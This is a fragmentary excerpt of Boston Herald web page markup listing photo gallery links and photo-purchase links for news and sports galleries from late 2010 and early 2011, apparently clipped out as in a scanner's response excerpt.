<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4830','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110116/stp/27bc52_011511mushce001.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4820','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110114/stp/19cc02_011311arizona.jpeg04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4813','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110113/stp/492776_Congresswoman_Shot_Obama__trose@heraldinteractive.com_43.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4804','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110111/stp/e5c919_010511haitiar04.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Haiti families rebuild"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Haiti families rebuild">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4802','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110111/stp/9cec40_011111kennedypw001.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Joe Kennedy III condemns Tucson shootings"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Joe Kennedy III condemns Tucson shootings">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4800','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110111/stp/9aef59_011011tucson04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4797','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110110/stp/9a24a7_Congresswoman_Shot_Maho-3.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4796','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110110/stp/bca28b_010911balletfn02.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Bay State ballerina hopefuls"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Bay State ballerina hopefuls">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4793','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110108/stp/7da572_883504eba8db6a00e10e6a7067009f08.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4788','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110106/stp/5d68d0_010611guvtf01.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Inauguration Day"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Inauguration Day">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4784','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110106/stp/f7e3e6_010511swearingtf10.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Swearing in the new Legislature"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Swearing in the new Legislature">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4778','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110104/stp/035aca_010411parolems06.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Parole Board meeting"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Parole Board meeting">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4776','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110104/stp/b85dcd_010311megamw002.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Lottery madness"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Lottery madness">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4775','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110102/stp/e8f59d_073010explosionjw23.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\2010 in pictures"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\2010 in pictures">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4773','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110102/stp/bac977_010111brownieskm05.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\L Street Brownies' annual New Year...s Day swim"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\L Street Brownies' annual New Year...s Day swim">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4771','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110101/stp/fdc1cf_123110policejw03.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4760','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101231/stp/690b34_123010wakece004.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4881','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/086319_012711bcms06.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Florida State 102, BC 93"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Florida State 102, BC 93">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4872','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110126/stp/cd0702_012611bruinsms04.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4868','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110126/stp/b85afa_012511celticsmw01.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4862','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110125/stp/036e70_012411celtsnl02.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4856','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110122/stp/03331b_012111hockeyce005.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4855','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110122/stp/3ab710_012111celticssc02.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4848','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110121/stp/830e10_012011bruinsms02.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4846','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110120/stp/fcbae7_011911celticsms04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4845','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110119/stp/7c5708_011911soxnl10.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Red Sox Rookie Program at BC"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Red Sox Rookie Program at BC">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4843','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110118/stp/022de6_011711celticsce030.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4841','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110117/stp/95be5a_011711bruinsnl20.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4831','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110116/stp/54c191_Seahawks_Bears_Football__trose@heraldinteractive.com_24.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4829','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110115/stp/fed6dc_APTOPIX_Ravens_Steelers_Football__trose@heraldinteractive.com_15.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4828','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110115/stp/92b48a_011511bruinsjw02.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4826','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110115/stp/c33a6c_011411celticssc15.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4825','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110115/stp/9da8b3_011411patstf18.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4819','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110114/stp/603f10_011311patsmw05.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4818','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110114/stp/de77f1_011311bruinsms07.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4812','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110112/stp/be66c8_011211celticsms04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4808','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110112/stp/2a53c5_PatsFansB011211.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4805','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110112/stp/e563d8_011111bruinsmw04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4801','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110111/stp/440065_011111patsjw04.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4799','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110111/stp/c17ee9_011011celtsmw006.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4792','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110108/stp/f40e45_010711celticssc13.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4791','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110108/stp/fad0b9_010611crawfordnl02.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Carl Crawford works out in Houston"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Carl Crawford works out in Houston">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4789','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110107/stp/f1d006_010511crawfordnl12.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\At home with Carl Crawford"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\At home with Carl Crawford">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4785','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110106/stp/11080d_010511celticsms05.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4777','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110104/stp/ee1234_010311celtsmw021.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4774','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110102/stp/940585_010211pats027.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4772','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110101/stp/d1d0a1_123110patriotsDR03.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4770','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110101/stp/467227_123110celticsmh15.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4763','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101231/stp/a92882_123010bchoopsms05A.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Boston College beats Northeastern 80-67"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Boston College beats Northeastern 80-67">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4761','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101231/stp/5d7332_123010patsjw09.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4866','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110125/stp/61e5f9_tgrit.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4859','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110123/stp/873e80_012211caesarap09.JPG" alt="Photo" /></a>
